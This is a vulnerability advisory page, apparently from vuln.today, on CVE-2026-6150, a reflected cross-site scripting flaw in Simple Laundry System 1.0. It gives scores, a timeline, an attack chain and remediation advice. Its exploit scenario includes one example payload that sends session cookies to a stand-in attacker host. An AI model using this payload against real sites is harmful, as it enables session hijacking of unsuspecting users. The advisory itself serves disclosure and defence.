Skip to main content

PHP CVE-2026-6150

| EUVD-2026-21779 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-04-13 VulDB GHSA-8f84-x6pj-qm67
2.1
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

8
Severity Changed
Apr 29, 2026 - 01:11 NVD
MEDIUM LOW
CVSS changed
Apr 29, 2026 - 01:11 NVD
5.3 (MEDIUM) 2.1 (LOW)
PoC Detected
Apr 29, 2026 - 01:00 vuln.today
Public exploit code
CVSS changed
Apr 13, 2026 - 03:22 NVD
4.3 (MEDIUM) 5.3 (MEDIUM)
Analysis Generated
Apr 13, 2026 - 02:49 vuln.today
EUVD ID Assigned
Apr 13, 2026 - 02:45 euvd
EUVD-2026-21779
Analysis Generated
Apr 13, 2026 - 02:45 vuln.today
CVE Published
Apr 13, 2026 - 02:00 nvd
LOW 2.1

DescriptionCVE.org

A vulnerability has been found in code-projects Simple Laundry System 1.0. This affects an unknown part of the file /checkupdatestatus.php. The manipulation of the argument serviceId leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

AnalysisAI

Cross-site scripting (XSS) in code-projects Simple Laundry System 1.0 allows remote attackers to inject arbitrary scripts via the serviceId parameter in /checkupdatestatus.php. The vulnerability requires user interaction (UI:R) and results in low integrity impact, but is publicly available with exploit code and has been disclosed. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft malicious URL with XSS payload
Delivery
Send link to target user
Exploit
User clicks link in browser
Execution
PHP application reflects unsanitized serviceId parameter
Persist
JavaScript executes in victim's browser context
Impact
Attacker steals session cookies or performs unauthorized actions

Vulnerability AssessmentAI

Risk Assessment The CVSS:3.1 score of 4.3 reflects a medium-low severity rating driven by: AV:N (network-accessible), AC:L (low complexity), PR:N (no authentication required), UI:R (requires user click), S:U (unchanged scope), and impact ratings of I:L (low integrity impact) and C:N/A:N (no confidentiality or availability impact). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious URL containing embedded JavaScript in the serviceId parameter (e.g., /checkupdatestatus.php?serviceId=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>) and distributes it via email or social engineering. When an authenticated user of the Simple Laundry System clicks the link, the unvalidated input is reflected back in the HTTP response and executed in the victim's browser, allowing the attacker to steal session cookies or perform actions on behalf of the user. …
Remediation Implement immediate input validation and output encoding in /checkupdatestatus.php by sanitizing the serviceId parameter using context-appropriate functions (e.g., htmlspecialchars() or htmlentities() for HTML context in PHP) and validating against an allowlist of expected values. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-6150 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy